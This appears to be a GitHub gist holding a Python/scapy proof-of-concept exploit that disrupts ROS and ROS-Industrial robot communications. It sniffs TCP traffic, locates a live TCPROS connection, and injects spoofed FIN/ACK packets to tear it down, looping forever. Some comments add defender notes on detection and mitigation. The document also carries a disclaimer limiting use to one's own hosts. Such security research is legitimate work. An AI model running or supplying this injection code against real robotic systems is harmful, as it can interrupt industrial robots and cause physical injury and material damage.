
@vmayoral
Created September 6, 2020 09:48
FIN-ACK attack proof-of-concept for disrupting ROS and ROS-Industrial setups.
"""
FIN-ACK attack for ROS
DISCLAIMER: Use against your own hosts only! By no means Alias Robotics
or the authors of this exploit encourage or promote the unauthorized tampering
with running robotic systems. This can cause serious human harm and material
damages.
"""
from scapy.all import *
from robosploit.modules.generic.robotics.all import *
from robosploit.core.exploit import *
from robosploit.core.http.http_client import HTTPClient
from scapy.layers.inet import TCP
from scapy.layers.l2 import Ether
import sys
# Tell scapy to dissect the payload of TCP segments as TCPROS, so that
# sniffed packets expose TCPROS layers (e.g. TCPROSBody) for indexing.
# NOTE(review): TCPROS/TCPROSBody come from the star imports above
# (presumably the robosploit robotics module) — confirm which one provides them.
bind_layers(TCP, TCPROS)
def tcpros_fin_ack():
    """
    Sniff TCP traffic on eth0, locate the latest TCPROS body segment together
    with the ACK that answers it, and send one spoofed FIN/ACK into that
    connection so the peer tears it down.

    Side effects: captures from and transmits on the network (sniff, sr1, send).
    Returns None; nothing is reported about success or failure.

    Defender notes (grounded in the values used below):
    - The capture is a plain sniff on eth0, so the sender must see the
      publisher/subscriber traffic on its own segment; network segmentation
      limits exposure.
    - The forged segment copies addresses and ports from a live flow but uses
      a fixed ttl=99 and id=<observed id>+1; TTL/IP-ID values that do not match
      the real host's normal values are an observable anomaly for IDS rules.
    - TCPROS here is carried in the clear over TCP with no integrity check;
      an authenticated transport would reject injected segments.
    """
    flag_valid = True
    targetp = None
    targetp_ack = None
    # Capture batches of 4 TCP packets (count=4) until one batch contains a
    # TCPROS body segment followed by its matching ACK.
    while flag_valid:
        packages = sniff(iface="eth0", filter="tcp", count=4)
        # packages[TCPROSBody] is assumed to be the scapy PacketList layer
        # filter (packets carrying a TCPROSBody layer) — TODO confirm.
        if len(packages[TCPROSBody]) < 1:
            continue
        else:
            # Use the most recent TCPROS body in the batch as the target flow.
            targetp = packages[TCPROSBody][-1] # pick latest instance
            index = packages.index(packages[TCPROSBody][-1])
            # Walk the packets captured after the target looking for the
            # reverse-direction segment whose seq equals the target's ack.
            for i in range(index + 1, len(packages)):
                targetp_ack = packages[i]
                # check if the ack matches appropriately
                if targetp[IP].src == targetp_ack[IP].dst and \
                   targetp[IP].dst == targetp_ack[IP].src and \
                   targetp[TCP].sport == targetp_ack[TCP].dport and \
                   targetp[TCP].dport == targetp_ack[TCP].sport and \
                   targetp[TCP].ack == targetp_ack[TCP].seq:
                    flag_valid = False
                    break
    # Only reached once a target/ack pair was found; both are guarded anyway
    # because targetp_ack may still hold the last non-matching packet.
    if not flag_valid and targetp_ack and targetp:
        # Option 2
        # Spoofed FIN/ACK in the direction of the target packet, with the
        # sequence numbers taken from the observed ACK. ttl=99 and id+1 are
        # hard-coded and do not track the real host's values.
        p_attack =IP(src=targetp[IP].src, dst=targetp[IP].dst,id=targetp[IP].id + 1,ttl=99)\
        /TCP(sport=targetp[TCP].sport,dport=targetp[TCP].dport,flags="FA", seq=targetp_ack[TCP].ack,
        ack=targetp_ack[TCP].seq)
        # sr1 waits at most 1 s for a single reply and does not retry.
        ans = sr1(p_attack, retry=0, timeout=1)
        # If the peer answers with its own FIN/ACK, complete the teardown
        # with a final ACK (same spoofed IP header as above).
        if ans and len(ans) > 0 and ans[TCP].flags == "FA":
            p_ack =IP(src=targetp[IP].src, dst=targetp[IP].dst,id=targetp[IP].id + 1,ttl=99)\
            /TCP(sport=targetp[TCP].sport,dport=targetp[TCP].dport,flags="A", seq=ans[TCP].ack,
            ack=ans[TCP].seq + 1)
            send(p_ack)
# Entry point: repeats the sniff-and-inject cycle forever; there is no exit
# condition, so the script only stops on an interrupt or an unhandled error.
# NOTE(review): runs at import time — there is no `if __name__ == "__main__":`
# guard, so importing this module as a library would start the loop.
while True:
    tcpros_fin_ack()